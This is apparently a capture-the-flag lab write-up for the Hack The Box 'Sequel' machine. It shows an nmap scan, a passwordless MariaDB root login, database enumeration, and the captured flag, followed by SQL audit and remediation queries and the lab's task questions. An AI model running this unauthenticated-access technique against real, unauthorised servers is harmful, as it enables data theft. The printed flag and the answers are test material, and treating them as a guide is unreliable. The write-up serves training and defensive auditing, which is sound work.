Very Easy · Tier 1 · Linux · 10.129.255.54

$ sequel.pwn()

A MariaDB (MySQL-compatible) server is exposed on port 3306 and accepts a login as root with no password. We enumerate the databases and tables and find the flag stored in the config table of the htb database.

Techniques

Unauthenticated MySQL Access
Database Enumeration

Open Ports

3306/tcp  mysql  MariaDB 10.3.27

Terminal Session

wazimu@htb ~ sequel
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.255.54
Starting Nmap 7.94SVN at 2025-11-01 01:12 CDT
Nmap scan report for 10.129.255.54
Host is up (0.0100s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Auth Plugin Name: mysql_native_password

┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ mysql -h 10.129.255.54 -u root
Welcome to the MariaDB monitor.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.013 sec)

MariaDB [(none)]> USE htb;
Database changed

MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+

MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
+----+-----------------------+----------------------------------+

[✓] Flag found in config table!
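The session above walks the schema one SHOW statement at a time and stops at the flag. The queries below are an added example, not part of the original writeup: they collapse the enumeration into a single information_schema query, then turn the same access into the audit a DBA would run on this host (which accounts have no password, which are reachable from any host) and the statements that close the hole. They assume the MariaDB 10.3 layout of mysql.user that this box runs; on 10.4 and later mysql.user is a view over mysql.global_priv and the Password column no longer exists. The 'root'@'%' account in the remediation step and the password value are placeholders: confirm the actual User/Host pair from the audit output first.

```sql
-- Added example (not from the original writeup). Assumes MariaDB 10.3's
-- mysql.user table layout; adjust for 10.4+ where mysql.user is a view.

-- 1. Enumerate every non-system schema and table in one query instead of
--    SHOW DATABASES / USE / SHOW TABLES for each database in turn.
SELECT table_schema, table_name, table_rows
FROM information_schema.tables
WHERE table_schema NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
ORDER BY table_schema, table_name;
-- On this host the only rows returned are htb.config and htb.users.

-- 2. Audit: which accounts authenticate with no password at all, and from
--    which hosts? A root row with an empty password and a remote host
--    pattern is what allowed the unauthenticated login seen above.
SELECT User, Host, plugin
FROM mysql.user
WHERE Password = ''
  AND authentication_string = ''
  AND plugin IN ('', 'mysql_native_password');

-- 3. Audit: which accounts are reachable from every host?
SELECT User, Host
FROM mysql.user
WHERE Host = '%';

-- 4. Remediation for the findings above. 'root'@'%' is the assumed name of
--    the offending row (take it from query 2), and the password is a
--    placeholder to be replaced before running.
DROP USER IF EXISTS 'root'@'%';
ALTER USER 'root'@'localhost' IDENTIFIED BY '<replace-with-strong-password>';
```

Run queries 1 to 3 with a read-only account as part of a scheduled check; any row back from query 2 is a finding. The SQL fixes the account, but the exposure itself comes from the listener: if nothing off-host needs the database, set bind-address = 127.0.0.1 in the server's my.cnf so port 3306 is no longer reachable from the network at all.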

Tasks (7)

1. During our scan, which port do we find serving MySQL?

2. What community-developed MySQL version is the target running?

3. When using the MySQL command line client, what switch do we need to use in order to specify a login username?

4. Which username allows us to log into this MariaDB instance without providing a password?

5. In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

6. In SQL, what symbol do we need to end each query with?

7. There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?

Root Flag